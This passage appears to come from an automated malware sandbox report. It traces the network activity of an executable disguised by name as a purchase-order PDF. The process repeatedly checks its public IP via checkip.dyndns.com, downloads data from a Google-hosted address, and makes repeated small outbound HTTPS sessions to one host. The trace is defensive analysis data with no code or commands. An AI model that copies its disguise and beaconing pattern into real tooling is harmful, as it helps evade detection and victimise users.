Dec 19, 2024 15:30:48.282063961 CET | 80 | 49931 | 132.226.247.73 | 192.168.2.5 |
Dec 19, 2024 15:30:48.283658981 CET | 49937 | 443 | 192.168.2.5 | 149.154.167.220 |
Dec 19, 2024 15:30:48.283729076 CET | 443 | 49937 | 149.154.167.220 | 192.168.2.5 |
Dec 19, 2024 15:30:48.283823967 CET | 49937 | 443 | 192.168.2.5 | 149.154.167.220 |
Dec 19, 2024 15:30:48.284146070 CET | 49937 | 443 | 192.168.2.5 | 149.154.167.220 |
Dec 19, 2024 15:30:48.284173965 CET | 443 | 49937 | 149.154.167.220 | 192.168.2.5 |
Dec 19, 2024 15:30:48.335469007 CET | 49931 | 80 | 192.168.2.5 | 132.226.247.73 |
Dec 19, 2024 15:30:48.794163942 CET | 80 | 49761 | 132.226.247.73 | 192.168.2.5 |
Dec 19, 2024 15:30:48.794279099 CET | 49761 | 80 | 192.168.2.5 | 132.226.247.73 |
Dec 19, 2024 15:30:49.652604103 CET | 443 | 49937 | 149.154.167.220 | 192.168.2.5 |
Dec 19, 2024 15:30:49.654329062 CET | 49937 | 443 | 192.168.2.5 | 149.154.167.220 |
Dec 19, 2024 15:30:49.654409885 CET | 443 | 49937 | 149.154.167.220 | 192.168.2.5 |
Dec 19, 2024 15:30:49.654505014 CET | 49937 | 443 | 192.168.2.5 | 149.154.167.220 |
Dec 19, 2024 15:30:49.654520035 CET | 443 | 49937 | 149.154.167.220 | 192.168.2.5 |
Dec 19, 2024 15:30:50.316178083 CET | 443 | 49937 | 149.154.167.220 | 192.168.2.5 |
Dec 19, 2024 15:30:50.316272020 CET | 443 | 49937 | 149.154.167.220 | 192.168.2.5 |
Dec 19, 2024 15:30:50.316344023 CET | 49937 | 443 | 192.168.2.5 | 149.154.167.220 |
Dec 19, 2024 15:30:50.316999912 CET | 49937 | 443 | 192.168.2.5 | 149.154.167.220 |
Dec 19, 2024 15:30:50.321760893 CET | 49931 | 80 | 192.168.2.5 | 132.226.247.73 |
Dec 19, 2024 15:30:50.323159933 CET | 49942 | 80 | 192.168.2.5 | 132.226.247.73 |
Dec 19, 2024 15:30:50.443751097 CET | 80 | 49931 | 132.226.247.73 | 192.168.2.5 |
Dec 19, 2024 15:30:50.443824053 CET | 49931 | 80 | 192.168.2.5 | 132.226.247.73 |
Dec 19, 2024 15:30:50.445051908 CET | 80 | 49942 | 132.226.247.73 | 192.168.2.5 |
Dec 19, 2024 15:30:50.445144892 CET | 49942 | 80 | 192.168.2.5 | 132.226.247.73 |
Dec 19, 2024 15:30:50.445310116 CET | 49942 | 80 | 192.168.2.5 | 132.226.247.73 |
Dec 19, 2024 15:30:50.569422960 CET | 80 | 49942 | 132.226.247.73 | 192.168.2.5 |
Dec 19, 2024 15:30:51.756139040 CET | 80 | 49942 | 132.226.247.73 | 192.168.2.5 |
Dec 19, 2024 15:30:51.758093119 CET | 49947 | 443 | 192.168.2.5 | 149.154.167.220 |
Dec 19, 2024 15:30:51.758119106 CET | 443 | 49947 | 149.154.167.220 | 192.168.2.5 |
Dec 19, 2024 15:30:51.758219957 CET | 49947 | 443 | 192.168.2.5 | 149.154.167.220 |
Dec 19, 2024 15:30:51.758519888 CET | 49947 | 443 | 192.168.2.5 | 149.154.167.220 |
Dec 19, 2024 15:30:51.758531094 CET | 443 | 49947 | 149.154.167.220 | 192.168.2.5 |
Dec 19, 2024 15:30:51.804204941 CET | 49942 | 80 | 192.168.2.5 | 132.226.247.73 |
Dec 19, 2024 15:30:53.128321886 CET | 443 | 49947 | 149.154.167.220 | 192.168.2.5 |
Dec 19, 2024 15:30:53.130317926 CET | 49947 | 443 | 192.168.2.5 | 149.154.167.220 |
Dec 19, 2024 15:30:53.130340099 CET | 443 | 49947 | 149.154.167.220 | 192.168.2.5 |
Dec 19, 2024 15:30:53.130436897 CET | 49947 | 443 | 192.168.2.5 | 149.154.167.220 |
Dec 19, 2024 15:30:53.130443096 CET | 443 | 49947 | 149.154.167.220 | 192.168.2.5 |
Dec 19, 2024 15:30:53.779226065 CET | 443 | 49947 | 149.154.167.220 | 192.168.2.5 |
Dec 19, 2024 15:30:53.779316902 CET | 443 | 49947 | 149.154.167.220 | 192.168.2.5 |
Dec 19, 2024 15:30:53.779627085 CET | 49947 | 443 | 192.168.2.5 | 149.154.167.220 |
Dec 19, 2024 15:30:53.779908895 CET | 49947 | 443 | 192.168.2.5 | 149.154.167.220 |
Dec 19, 2024 15:30:53.783374071 CET | 49942 | 80 | 192.168.2.5 | 132.226.247.73 |
Dec 19, 2024 15:30:53.784164906 CET | 49952 | 80 | 192.168.2.5 | 132.226.247.73 |
Dec 19, 2024 15:30:53.903666973 CET | 80 | 49942 | 132.226.247.73 | 192.168.2.5 |
Dec 19, 2024 15:30:53.903712988 CET | 80 | 49952 | 132.226.247.73 | 192.168.2.5 |
Dec 19, 2024 15:30:53.903769970 CET | 49942 | 80 | 192.168.2.5 | 132.226.247.73 |
Dec 19, 2024 15:30:53.903803110 CET | 49952 | 80 | 192.168.2.5 | 132.226.247.73 |
Dec 19, 2024 15:30:53.903964043 CET | 49952 | 80 | 192.168.2.5 | 132.226.247.73 |
Dec 19, 2024 15:30:54.023660898 CET | 80 | 49952 | 132.226.247.73 | 192.168.2.5 |
Dec 19, 2024 15:30:55.210642099 CET | 80 | 49952 | 132.226.247.73 | 192.168.2.5 |
Dec 19, 2024 15:30:55.236578941 CET | 49955 | 443 | 192.168.2.5 | 149.154.167.220 |
Dec 19, 2024 15:30:55.236685991 CET | 443 | 49955 | 149.154.167.220 | 192.168.2.5 |
Dec 19, 2024 15:30:55.236766100 CET | 49955 | 443 | 192.168.2.5 | 149.154.167.220 |
Dec 19, 2024 15:30:55.237215996 CET | 49955 | 443 | 192.168.2.5 | 149.154.167.220 |
Dec 19, 2024 15:30:55.237251043 CET | 443 | 49955 | 149.154.167.220 | 192.168.2.5 |
Dec 19, 2024 15:30:55.257339954 CET | 49952 | 80 | 192.168.2.5 | 132.226.247.73 |
Dec 19, 2024 15:30:56.601099014 CET | 443 | 49955 | 149.154.167.220 | 192.168.2.5 |
Dec 19, 2024 15:30:56.603755951 CET | 49955 | 443 | 192.168.2.5 | 149.154.167.220 |
Dec 19, 2024 15:30:56.603801012 CET | 443 | 49955 | 149.154.167.220 | 192.168.2.5 |
Dec 19, 2024 15:30:56.603945971 CET | 49955 | 443 | 192.168.2.5 | 149.154.167.220 |
Dec 19, 2024 15:30:56.603952885 CET | 443 | 49955 | 149.154.167.220 | 192.168.2.5 |
Dec 19, 2024 15:30:57.250334978 CET | 443 | 49955 | 149.154.167.220 | 192.168.2.5 |
Dec 19, 2024 15:30:57.251780033 CET | 443 | 49955 | 149.154.167.220 | 192.168.2.5 |
Dec 19, 2024 15:30:57.251878023 CET | 49955 | 443 | 192.168.2.5 | 149.154.167.220 |
Dec 19, 2024 15:30:57.252789021 CET | 49955 | 443 | 192.168.2.5 | 149.154.167.220 |
Dec 19, 2024 15:30:57.259572029 CET | 49952 | 80 | 192.168.2.5 | 132.226.247.73 |
Dec 19, 2024 15:30:57.261198997 CET | 49961 | 80 | 192.168.2.5 | 132.226.247.73 |
Dec 19, 2024 15:30:57.379476070 CET | 80 | 49952 | 132.226.247.73 | 192.168.2.5 |
Dec 19, 2024 15:30:57.379539013 CET | 49952 | 80 | 192.168.2.5 | 132.226.247.73 |
Dec 19, 2024 15:30:57.380826950 CET | 80 | 49961 | 132.226.247.73 | 192.168.2.5 |
Dec 19, 2024 15:30:57.380903006 CET | 49961 | 80 | 192.168.2.5 | 132.226.247.73 |
Dec 19, 2024 15:30:57.381041050 CET | 49961 | 80 | 192.168.2.5 | 132.226.247.73 |
Dec 19, 2024 15:30:57.500644922 CET | 80 | 49961 | 132.226.247.73 | 192.168.2.5 |
Dec 19, 2024 15:30:59.684894085 CET | 80 | 49961 | 132.226.247.73 | 192.168.2.5 |
Dec 19, 2024 15:30:59.686619043 CET | 49967 | 443 | 192.168.2.5 | 149.154.167.220 |
Dec 19, 2024 15:30:59.686674118 CET | 443 | 49967 | 149.154.167.220 | 192.168.2.5 |
Dec 19, 2024 15:30:59.686822891 CET | 49967 | 443 | 192.168.2.5 | 149.154.167.220 |
Dec 19, 2024 15:30:59.687220097 CET | 49967 | 443 | 192.168.2.5 | 149.154.167.220 |
Dec 19, 2024 15:30:59.687232018 CET | 443 | 49967 | 149.154.167.220 | 192.168.2.5 |
Dec 19, 2024 15:30:59.726094007 CET | 49961 | 80 | 192.168.2.5 | 132.226.247.73 |
Dec 19, 2024 15:31:01.052758932 CET | 443 | 49967 | 149.154.167.220 | 192.168.2.5 |
Dec 19, 2024 15:31:01.080029964 CET | 49967 | 443 | 192.168.2.5 | 149.154.167.220 |
Dec 19, 2024 15:31:01.080056906 CET | 443 | 49967 | 149.154.167.220 | 192.168.2.5 |
Dec 19, 2024 15:31:01.080122948 CET | 49967 | 443 | 192.168.2.5 | 149.154.167.220 |
Dec 19, 2024 15:31:01.080127954 CET | 443 | 49967 | 149.154.167.220 | 192.168.2.5 |
Dec 19, 2024 15:31:01.789340973 CET | 443 | 49967 | 149.154.167.220 | 192.168.2.5 |
Dec 19, 2024 15:31:01.789412975 CET | 443 | 49967 | 149.154.167.220 | 192.168.2.5 |
Dec 19, 2024 15:31:01.789464951 CET | 49967 | 443 | 192.168.2.5 | 149.154.167.220 |
Dec 19, 2024 15:31:01.792789936 CET | 49967 | 443 | 192.168.2.5 | 149.154.167.220 |
Dec 19, 2024 15:31:01.804651976 CET | 49961 | 80 | 192.168.2.5 | 132.226.247.73 |
Dec 19, 2024 15:31:01.806581974 CET | 49973 | 80 | 192.168.2.5 | 132.226.247.73 |
Dec 19, 2024 15:31:01.924550056 CET | 80 | 49961 | 132.226.247.73 | 192.168.2.5 |
Dec 19, 2024 15:31:01.924611092 CET | 49961 | 80 | 192.168.2.5 | 132.226.247.73 |
Dec 19, 2024 15:31:01.927634001 CET | 80 | 49973 | 132.226.247.73 | 192.168.2.5 |
Dec 19, 2024 15:31:01.927705050 CET | 49973 | 80 | 192.168.2.5 | 132.226.247.73 |
Dec 19, 2024 15:31:01.950740099 CET | 49973 | 80 | 192.168.2.5 | 132.226.247.73 |
Dec 19, 2024 15:31:02.070529938 CET | 80 | 49973 | 132.226.247.73 | 192.168.2.5 |
Dec 19, 2024 15:31:03.239947081 CET | 80 | 49973 | 132.226.247.73 | 192.168.2.5 |
Dec 19, 2024 15:31:03.241168976 CET | 49979 | 443 | 192.168.2.5 | 149.154.167.220 |
Dec 19, 2024 15:31:03.241202116 CET | 443 | 49979 | 149.154.167.220 | 192.168.2.5 |
Dec 19, 2024 15:31:03.241265059 CET | 49979 | 443 | 192.168.2.5 | 149.154.167.220 |
Dec 19, 2024 15:31:03.241527081 CET | 49979 | 443 | 192.168.2.5 | 149.154.167.220 |
Dec 19, 2024 15:31:03.241538048 CET | 443 | 49979 | 149.154.167.220 | 192.168.2.5 |
Dec 19, 2024 15:31:03.288630962 CET | 49973 | 80 | 192.168.2.5 | 132.226.247.73 |
Dec 19, 2024 15:31:04.775685072 CET | 443 | 49979 | 149.154.167.220 | 192.168.2.5 |
Dec 19, 2024 15:31:04.819873095 CET | 49979 | 443 | 192.168.2.5 | 149.154.167.220 |
Dec 19, 2024 15:31:06.405047894 CET | 49979 | 443 | 192.168.2.5 | 149.154.167.220 |
Dec 19, 2024 15:31:06.405069113 CET | 443 | 49979 | 149.154.167.220 | 192.168.2.5 |
Dec 19, 2024 15:31:06.405153036 CET | 49979 | 443 | 192.168.2.5 | 149.154.167.220 |
Dec 19, 2024 15:31:06.405160904 CET | 443 | 49979 | 149.154.167.220 | 192.168.2.5 |
Dec 19, 2024 15:31:07.086625099 CET | 443 | 49979 | 149.154.167.220 | 192.168.2.5 |
Dec 19, 2024 15:31:07.086819887 CET | 443 | 49979 | 149.154.167.220 | 192.168.2.5 |
Dec 19, 2024 15:31:07.087083101 CET | 49979 | 443 | 192.168.2.5 | 149.154.167.220 |
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Dec 19, 2024 15:29:20.939297915 CET | 51524 | 53 | 192.168.2.5 | 1.1.1.1 |
Dec 19, 2024 15:29:21.076962948 CET | 53 | 51524 | 1.1.1.1 | 192.168.2.5 |
Dec 19, 2024 15:29:23.930536032 CET | 51511 | 53 | 192.168.2.5 | 1.1.1.1 |
Dec 19, 2024 15:29:24.069997072 CET | 53 | 51511 | 1.1.1.1 | 192.168.2.5 |
Dec 19, 2024 15:29:29.782740116 CET | 61006 | 53 | 192.168.2.5 | 1.1.1.1 |
Dec 19, 2024 15:29:29.919830084 CET | 53 | 61006 | 1.1.1.1 | 192.168.2.5 |
Dec 19, 2024 15:29:32.160598993 CET | 62362 | 53 | 192.168.2.5 | 1.1.1.1 |
Dec 19, 2024 15:29:32.305747986 CET | 53 | 62362 | 1.1.1.1 | 192.168.2.5 |
Dec 19, 2024 15:29:39.969598055 CET | 54798 | 53 | 192.168.2.5 | 1.1.1.1 |
Dec 19, 2024 15:29:40.107425928 CET | 53 | 54798 | 1.1.1.1 | 192.168.2.5 |
Dec 19, 2024 15:30:40.116313934 CET | 55274 | 53 | 192.168.2.5 | 1.1.1.1 |
Dec 19, 2024 15:30:40.337245941 CET | 53 | 55274 | 1.1.1.1 | 192.168.2.5 |
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS |
---|---|---|---|---|---|---|---|---|
Dec 19, 2024 15:29:20.939297915 CET | 192.168.2.5 | 1.1.1.1 | 0xca5 | Standard query (0) | | A (IP address) | IN (0x0001) | false |
Dec 19, 2024 15:29:23.930536032 CET | 192.168.2.5 | 1.1.1.1 | 0x3bfa | Standard query (0) | | A (IP address) | IN (0x0001) | false |
Dec 19, 2024 15:29:29.782740116 CET | 192.168.2.5 | 1.1.1.1 | 0x2b9 | Standard query (0) | | A (IP address) | IN (0x0001) | false |
Dec 19, 2024 15:29:32.160598993 CET | 192.168.2.5 | 1.1.1.1 | 0x25a1 | Standard query (0) | | A (IP address) | IN (0x0001) | false |
Dec 19, 2024 15:29:39.969598055 CET | 192.168.2.5 | 1.1.1.1 | 0xd70c | Standard query (0) | | A (IP address) | IN (0x0001) | false |
Dec 19, 2024 15:30:40.116313934 CET | 192.168.2.5 | 1.1.1.1 | 0xfe4d | Standard query (0) | | A (IP address) | IN (0x0001) | false |
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS |
---|---|---|---|---|---|---|---|---|---|---|
Dec 19, 2024 15:29:21.076962948 CET | 1.1.1.1 | 192.168.2.5 | 0xca5 | No error (0) | | | 216.58.208.238 | A (IP address) | IN (0x0001) | false |
Dec 19, 2024 15:29:24.069997072 CET | 1.1.1.1 | 192.168.2.5 | 0x3bfa | No error (0) | | | 172.217.17.65 | A (IP address) | IN (0x0001) | false |
Dec 19, 2024 15:29:29.919830084 CET | 1.1.1.1 | 192.168.2.5 | 0x2b9 | No error (0) | | checkip.dyndns.com | | CNAME (Canonical name) | IN (0x0001) | false |
Dec 19, 2024 15:29:29.919830084 CET | 1.1.1.1 | 192.168.2.5 | 0x2b9 | No error (0) | | | 132.226.247.73 | A (IP address) | IN (0x0001) | false |
Dec 19, 2024 15:29:29.919830084 CET | 1.1.1.1 | 192.168.2.5 | 0x2b9 | No error (0) | | | 132.226.8.169 | A (IP address) | IN (0x0001) | false |
Dec 19, 2024 15:29:29.919830084 CET | 1.1.1.1 | 192.168.2.5 | 0x2b9 | No error (0) | | | 158.101.44.242 | A (IP address) | IN (0x0001) | false |
Dec 19, 2024 15:29:29.919830084 CET | 1.1.1.1 | 192.168.2.5 | 0x2b9 | No error (0) | | | 193.122.6.168 | A (IP address) | IN (0x0001) | false |
Dec 19, 2024 15:29:29.919830084 CET | 1.1.1.1 | 192.168.2.5 | 0x2b9 | No error (0) | | | 193.122.130.0 | A (IP address) | IN (0x0001) | false |
Dec 19, 2024 15:29:32.305747986 CET | 1.1.1.1 | 192.168.2.5 | 0x25a1 | No error (0) | | | 104.21.67.152 | A (IP address) | IN (0x0001) | false |
Dec 19, 2024 15:29:32.305747986 CET | 1.1.1.1 | 192.168.2.5 | 0x25a1 | No error (0) | | | 172.67.177.134 | A (IP address) | IN (0x0001) | false |
Dec 19, 2024 15:29:40.107425928 CET | 1.1.1.1 | 192.168.2.5 | 0xd70c | No error (0) | | | 149.154.167.220 | A (IP address) | IN (0x0001) | false |
Dec 19, 2024 15:30:40.337245941 CET | 1.1.1.1 | 192.168.2.5 | 0xfe4d | No error (0) | | | 149.154.167.220 | A (IP address) | IN (0x0001) | false |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
0 | 192.168.2.5 | 49733 | 132.226.247.73 | 80 | 4796 | C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
Dec 19, 2024 15:29:30.046780109 CET | 151 | OUT | |
Dec 19, 2024 15:29:31.375972986 CET | 321 | IN | |
Dec 19, 2024 15:29:31.381685019 CET | 127 | OUT | |
Dec 19, 2024 15:29:31.858283043 CET | 321 | IN | |
Dec 19, 2024 15:29:39.514564991 CET | 127 | OUT | |
Dec 19, 2024 15:29:39.965440035 CET | 321 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
1 | 192.168.2.5 | 49761 | 132.226.247.73 | 80 | 4796 | C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
Dec 19, 2024 15:29:42.443367004 CET | 127 | OUT | |
Dec 19, 2024 15:29:43.795205116 CET | 321 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
2 | 192.168.2.5 | 49772 | 132.226.247.73 | 80 | 4796 | C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
Dec 19, 2024 15:29:46.028143883 CET | 151 | OUT | |
Dec 19, 2024 15:29:47.349688053 CET | 321 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
3 | 192.168.2.5 | 49781 | 132.226.247.73 | 80 | 4796 | C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
Dec 19, 2024 15:29:49.521976948 CET | 151 | OUT | |
Dec 19, 2024 15:29:50.827419996 CET | 321 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
4 | 192.168.2.5 | 49791 | 132.226.247.73 | 80 | 4796 | C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
Dec 19, 2024 15:29:53.120652914 CET | 151 | OUT | |
Dec 19, 2024 15:29:54.436521053 CET | 321 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
5 | 192.168.2.5 | 49802 | 132.226.247.73 | 80 | 4796 | C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
Dec 19, 2024 15:29:56.689657927 CET | 151 | OUT | |
Dec 19, 2024 15:29:58.008605003 CET | 321 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
6 | 192.168.2.5 | 49811 | 132.226.247.73 | 80 | 4796 | C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
Dec 19, 2024 15:30:00.156553030 CET | 151 | OUT | |
Dec 19, 2024 15:30:06.891166925 CET | 321 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
7 | 192.168.2.5 | 49833 | 132.226.247.73 | 80 | 4796 | C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
Dec 19, 2024 15:30:09.131577969 CET | 151 | OUT | |
Dec 19, 2024 15:30:19.378699064 CET | 321 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
8 | 192.168.2.5 | 49864 | 132.226.247.73 | 80 | 4796 | C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
Dec 19, 2024 15:30:21.603665113 CET | 151 | OUT | |
Dec 19, 2024 15:30:23.809283972 CET | 321 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
9 | 192.168.2.5 | 49877 | 132.226.247.73 | 80 | 4796 | C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
Dec 19, 2024 15:30:26.205121994 CET | 151 | OUT | |
Dec 19, 2024 15:30:28.553240061 CET | 321 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
10 | 192.168.2.5 | 49889 | 132.226.247.73 | 80 | 4796 | C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
Dec 19, 2024 15:30:30.846122026 CET | 151 | OUT | |
Dec 19, 2024 15:30:32.161087990 CET | 321 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
11 | 192.168.2.5 | 49899 | 132.226.247.73 | 80 | 4796 | C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
Dec 19, 2024 15:30:34.371108055 CET | 151 | OUT | |
Dec 19, 2024 15:30:35.676954031 CET | 321 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
12 | 192.168.2.5 | 49908 | 132.226.247.73 | 80 | 4796 | C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
Dec 19, 2024 15:30:37.811099052 CET | 151 | OUT | |
Dec 19, 2024 15:30:40.115158081 CET | 321 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
13 | 192.168.2.5 | 49923 | 132.226.247.73 | 80 | 4796 | C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
Dec 19, 2024 15:30:42.523655891 CET | 151 | OUT | |
Dec 19, 2024 15:30:43.826448917 CET | 321 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
14 | 192.168.2.5 | 49931 | 132.226.247.73 | 80 | 4796 | C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
Dec 19, 2024 15:30:45.977520943 CET | 151 | OUT | |
Dec 19, 2024 15:30:48.282063961 CET | 321 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
15 | 192.168.2.5 | 49942 | 132.226.247.73 | 80 | 4796 | C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
Dec 19, 2024 15:30:50.445310116 CET | 151 | OUT | |
Dec 19, 2024 15:30:51.756139040 CET | 321 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
16 | 192.168.2.5 | 49952 | 132.226.247.73 | 80 | 4796 | C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
Dec 19, 2024 15:30:53.903964043 CET | 151 | OUT | |
Dec 19, 2024 15:30:55.210642099 CET | 321 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
17 | 192.168.2.5 | 49961 | 132.226.247.73 | 80 | 4796 | C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
Dec 19, 2024 15:30:57.381041050 CET | 151 | OUT | |
Dec 19, 2024 15:30:59.684894085 CET | 321 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
18 | 192.168.2.5 | 49973 | 132.226.247.73 | 80 | 4796 | C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
Dec 19, 2024 15:31:01.950740099 CET | 151 | OUT | |
Dec 19, 2024 15:31:03.239947081 CET | 321 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
0 | 192.168.2.5 | 49713 | 216.58.208.238 | 443 | 4796 | C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-12-19 14:29:23 UTC | 216 | OUT | |
2024-12-19 14:29:23 UTC | 1920 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
1 | 192.168.2.5 | 49720 | 172.217.17.65 | 443 | 4796 | C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-12-19 14:29:25 UTC | 258 | OUT | |
2024-12-19 14:29:28 UTC | 4941 | IN | |
2024-12-19 14:29:28 UTC | 4941 | IN | |
2024-12-19 14:29:28 UTC | 4816 | IN | |
2024-12-19 14:29:28 UTC | 1323 | IN | |
2024-12-19 14:29:28 UTC | 1390 | IN | |
2024-12-19 14:29:29 UTC | 1390 | IN | |
2024-12-19 14:29:29 UTC | 1390 | IN | |
2024-12-19 14:29:29 UTC | 1390 | IN | |
2024-12-19 14:29:29 UTC | 1390 | IN | |
2024-12-19 14:29:29 UTC | 1390 | IN | |
2024-12-19 14:29:29 UTC | 1390 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
2 | 192.168.2.5 | 49738 | 104.21.67.152 | 443 | 4796 | C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-12-19 14:29:33 UTC | 85 | OUT | |
2024-12-19 14:29:33 UTC | 872 | IN | |
2024-12-19 14:29:33 UTC | 362 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
3 | 192.168.2.5 | 49756 | 149.154.167.220 | 443 | 4796 | C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-12-19 14:29:41 UTC | 296 | OUT | |
2024-12-19 14:29:41 UTC | 1090 | OUT | |
2024-12-19 14:29:42 UTC | 388 | IN | |
2024-12-19 14:29:42 UTC | 544 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
4 | 192.168.2.5 | 49766 | 149.154.167.220 | 443 | 4796 | C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-12-19 14:29:45 UTC | 296 | OUT | |
2024-12-19 14:29:45 UTC | 1090 | OUT | |
2024-12-19 14:29:45 UTC | 388 | IN | |
2024-12-19 14:29:45 UTC | 543 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
5 | 192.168.2.5 | 49776 | 149.154.167.220 | 443 | 4796 | C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-12-19 14:29:48 UTC | 272 | OUT | |
2024-12-19 14:29:48 UTC | 1090 | OUT | |
2024-12-19 14:29:49 UTC | 388 | IN | |
2024-12-19 14:29:49 UTC | 543 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
6 | 192.168.2.5 | 49785 | 149.154.167.220 | 443 | 4796 | C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-12-19 14:29:52 UTC | 272 | OUT | |
2024-12-19 14:29:52 UTC | 1090 | OUT | |
2024-12-19 14:29:52 UTC | 388 | IN | |
2024-12-19 14:29:52 UTC | 543 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
7 | 192.168.2.5 | 49796 | 149.154.167.220 | 443 | 4796 | C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-12-19 14:29:55 UTC | 296 | OUT | |
2024-12-19 14:29:55 UTC | 1090 | OUT | |
2024-12-19 14:29:56 UTC | 388 | IN | |
